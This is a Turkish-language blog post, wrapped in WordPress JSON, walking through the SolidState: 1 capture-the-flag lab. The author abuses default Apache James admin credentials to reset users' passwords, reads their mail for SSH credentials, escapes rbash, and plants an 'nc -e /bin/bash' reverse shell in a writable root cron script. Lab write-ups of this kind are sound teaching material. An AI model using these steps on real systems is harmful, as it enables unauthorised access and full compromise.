{"id":1340,"date":"2021-07-13T21:22:25","date_gmt":"2021-07-13T21:22:25","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1340"},"modified":"2021-07-13T21:22:25","modified_gmt":"2021-07-13T21:22:25","slug":"solidstate-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/13\/solidstate-1\/","title":{"rendered":"SOLIDSTATE: 1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nIt was originally created for HackTheBox<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/solidstate-1,261\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong>
\nhttps:\/\/download.vulnhub.com\/solidstate\/SolidState.zip<\/a><\/p>\n

Walkthrough<\/h2>\n

Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n

\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.6.1 00:50:56:c0:00:08   VMware, Inc.\n192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.\n192.168.6.142   00:0c:29:0c:40:ff   VMware, Inc.\n192.168.6.254   00:50:56:e2:4d:69   VMware, Inc.\n\n21 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 1.939 seconds (132.03 hosts\/sec). 4 responded\n<\/code><\/pre>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
[*] Scan: 182\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-13 17:13 EDT\nNmap scan report for 192.168.6.142\nHost is up (0.0010s latency).\nNot shown: 65529 closed ports\nPORT     STATE SERVICE     VERSION\n22\/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)\n|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)\n|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)\n25\/tcp   open  smtp        JAMES smtpd 2.3.2\n|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.6.132 [192.168.6.132]), PIPELINING, ENHANCEDSTATUSCODES, \n80\/tcp   open  http        Apache httpd 2.4.25 ((Debian))\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Home - Solid State Security\n110\/tcp  open  pop3        JAMES pop3d 2.3.2\n119\/tcp  open  nntp        JAMES nntpd (posting ok)\n4555\/tcp open  james-admin JAMES Remote Admin 2.3.2\nMAC Address: 00:0C:29:0C:40:FF (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: Host: solidstate; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   1.02 ms 192.168.6.142\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 31.63 seconds\n<\/code><\/pre>\n
http haricindeki portlardan bilgi toplamaya \u00e7al\u0131\u015fal\u0131m. nmap \u00e7\u0131kt\u0131lar\u0131nda sonra bir exploit aramas\u0131 yapt\u0131m ve a\u015fa\u011f\u0131daki sonu\u00e7lar\u0131 buldum.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# searchsploit JAMES  2.3.2\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nApache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)                                        | linux\/remote\/48130.rb\nApache James Server 2.3.2 - Remote Command Execution                                                                        | linux\/remote\/35513.py\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# cp $(locate linux\/remote\/35513.py) .\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# ls\n35513.py\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# cat 35513.py                        \n#!\/usr\/bin\/python\n#\n# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution\n# Date: 16\\10\\2014\n# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec\n# Vendor Homepage: http:\/\/james.apache.org\/server\/\n# Software Link: http:\/\/ftp.ps.pl\/pub\/apache\/james\/server\/apache-james-2.3.2.zip\n# Version: Apache James Server 2.3.2\n# Tested on: Ubuntu, Debian\n# Info: This exploit works on default installation of Apache James Server 2.3.2\n# Info: Example paths that will automatically execute payload on some action: \/etc\/bash_completion.d , \/etc\/pm\/config.d\n\nimport socket\nimport sys\nimport time\n\n# specify payload\n#payload = 'touch \/tmp\/proof.txt' # to exploit on any user \npayload = '[ "$(id -u)" == "0" ] && touch \/root\/proof.txt' # to exploit only on root\n# credentials to James Remote Administration Tool (Default - root\/root)\nuser = 'root'\npwd = 'root'\n...<\/code><\/pre>\n
credentials to James Remote Administration Tool (Default - root\/root)<\/strong> ifadesini g\u00f6r\u00fcnce bir denemek istedim ve ba\u015far\u0131l\u0131 oldumn.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# nc 192.168.6.142 4555\nJAMES Remote Administration Tool 2.3.2\nPlease enter your login and password\nLogin id:\nroot\nPassword:\nroot\nWelcome root. HELP for a list of commands\nhelp\nCurrently implemented commands:\nhelp                                    display this help\nlistusers                               display existing accounts\ncountusers                              display the number of existing accounts\nadduser [username] [password]           add a new user\nverify [username]                       verify if specified user exist\ndeluser [username]                      delete existing user\nsetpassword [username] [password]       sets a user's password\nsetalias [user] [alias]                 locally forwards all email for 'user' to 'alias'\nshowalias [username]                    shows a user's current email alias\nunsetalias [user]                       unsets an alias for 'user'\nsetforwarding [username] [emailaddress] forwards a user's email to another email address\nshowforwarding [username]               shows a user's current email forwarding\nunsetforwarding [username]              removes a forward\nuser [repositoryname]                   change to another user repository\nshutdown                                kills the current JVM (convenient when James is run as a daemon)\nquit                                    close connection\nlistusers\nExisting accounts 5\nuser: james\nuser: thomas\nuser: john\nuser: mindy\nuser: mailadmin\n\nUnknown command \nsetpassword james root \nPassword for james reset\nsetpassword thomas root\nPassword for thomas reset\nsetpassword john root\nPassword for john reset\nsetpassword mindy root\nPassword for mindy reset\nsetpassword mailadmin root\nPassword for mailadmin reset\nexit\nUnknown command exit\n^C<\/code><\/pre>\n
Art\u0131k herkesin maillerine bakabilirim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# telnet 192.168.6.142 110                                                                                                                              1 \u2a2f\nTrying 192.168.6.142...\nConnected to 192.168.6.142.\nEscape character is '^]'.\n+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready \nuser john\n+OK\npass root\n+OK Welcome john\nlist\n+OK 1 743\n1 743\n.\nretr 1\n+OK Message follows\nReturn-Path: <mailadmin@localhost>\nMessage-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: john@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581\n          for <john@localhost>;\n          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: New Hires access\nJohn, \n\nCan you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.\n\nThank you in advance.\n\nRespectfully,\nJames\n\n.\n^C^X\nexit\n^C^C^C^C  \nhelp\n^C^X^X^XConnection closed by foreign host.\n<\/code><\/pre>\n
Bakal\u0131m bir parola elde edebilecek miyiz?<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# telnet 192.168.6.142 110                                                                                                                              1 \u2a2f\nTrying 192.168.6.142...\nConnected to 192.168.6.142.\nEscape character is '^]'.\n+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready \nuser mindy\n+OK\npass root\n+OK Welcome mindy\nlist\n+OK 2 1945\n1 1109\n2 836\n.\nrety 1\n-ERR\nretr 1\n+OK Message follows\nReturn-Path: <mailadmin@localhost>\nMessage-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798\n          for <mindy@localhost>;\n          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Welcome\n\nDear Mindy,\nWelcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.\n\nWe are looking forward to you joining our team and your success at Solid State Security. \n\nRespectfully,\nJames\n.\nretr 2\n+OK Message follows\nReturn-Path: <mailadmin@localhost>\nMessage-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581\n          for <mindy@localhost>;\n          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Your Access\n\nDear Mindy,\n\nHere are your ssh credentials to access the system. Remember to reset your password after your first login. \nYour access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. \n\nusername: mindy\npass: P@55W0rd1!2@\n\nRespectfully,\nJames\n\n.\nquit\n+OK Apache James POP3 Server signing off.\nConnection closed by foreign host.\n<\/code><\/pre>\n
Harika bunun \u00fczerine ssh ile ba\u011flanmay\u0131 dedim ve ilk flagimi ald\u0131m ancak rbash<\/strong> ile kar\u015f\u0131la\u015ft\u0131m.<\/p>\n
\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# ssh mindy@192.168.6.142  \nThe authenticity of host '192.168.6.142 (192.168.6.142)' can't be established.\nECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.6.142' (ECDSA) to the list of known hosts.\nmindy@192.168.6.142's password: \nLinux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Aug 22 14:00:02 2017 from 192.168.11.142\nmindy@solidstate:~$ pwd\n\/home\/mindy\nmindy@solidstate:~$ whoami\n-rbash: whoami: command not found\nmindy@solidstate:~$ ls\nbin  user.txt\nmindy@solidstate:~$ cat user.txt\n914d0a4ebc1777889b5b89a23f556fd75\nmindy@solidstate:~$ \n<\/code><\/pre>\n
A\u015fa\u011f\u0131daki \u015fekilde bunu bypass edebildim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/solid]\n\u2514\u2500# ssh mindy@192.168.6.142  -t \"bash --noprofile\"                                                                                                        1 \u2a2f\nmindy@192.168.6.142's password: \n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id\nuid=1001(mindy) gid=1001(mindy) groups=1001(mindy)\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd\n\/home\/mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ ls\njames  mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ ls\njames  mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ cd james\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home\/james$ ls\nDesktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home\/james$ alias ls=\"ls -al\"<\/code><\/pre>\n
\u0130\u00e7eride gezindikten sonra root haklar\u0131nda ve de\u011fi\u015ftirebildi\u011fim bir dosya buldum. crotab'a eklenmesi umuduyla dosyay\u0131 de\u011fi\u015ftirdim. Ancak crontab'da oldu\u011funa emindim \u00e7\u00fcnk\u00fc daha \u00f6nceki arama \u00e7\u0131kt\u0131lar\u0131m\u0131 \/tmp kla\u00f6r\u00fcn\u00fc alt\u0131na at\u0131yordum. Belli bir s\u00fcre sonra bunlar\u0131n silindi\u011fini g\u00f6rm\u00fc\u015ft\u00fcm.<\/p>\n
${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ find \/ -writable -type f -exec ls -al {} \\; 2>\/dev\/null | tee result\n<\/code><\/pre>\n
${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat result | grep root | grep py\n-rwxrwxrwx 1 root root 105 Aug 22  2017 \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ nano \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ \n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat \/opt\/tmp.py\n#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n     os.system('rm -r \/tmp\/* ')\nexcept:\n     sys.exit()\n\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ nano \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat \/opt\/tmp.py\n#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n     os.system('nc 192.168.6.132 1822 -e \/bin\/bash')\nexcept:\n     sys.exit()\n\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ \n<\/code><\/pre>\n
Do\u011frulamas\u0131n\u0131 a\u015fa\u011f\u0131daki gibi yapabiliriz.<\/p>\n
# crontab -l\ncrontab -l\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use '*' in these fields (for 'any').# \n# Notice that tasks will be started based on the cron's system\n# daemon's notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n*\/3 * * * * python \/opt\/tmp.py\n\n# whoami\nwhoami\nroot\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: It was originally created for HackTheBox Vulnhub Sayfas\u0131: https:\/\/www.vulnhub.com\/entry\/solidstate-1,261\/ \u0130ndirme Sayfas\u0131: https:\/\/download.vulnhub.com\/solidstate\/SolidState.zip Walkthrough Makineyi tespit ederek ba\u015flayal\u0131m. \u250c\u2500\u2500(root💀kali)-[~] \u2514\u2500# arp-scan -l…<\/p>\n
Devam\u0131n\u0131 okuSOLIDSTATE: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[565,563,317,564],"class_list":["post-1340","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-apache-james-server","tag-crontab","tag-find","tag-restricted-shell","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1340"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340\/revisions"}],"predecessor-version":[{"id":1342,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340\/revisions\/1342"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}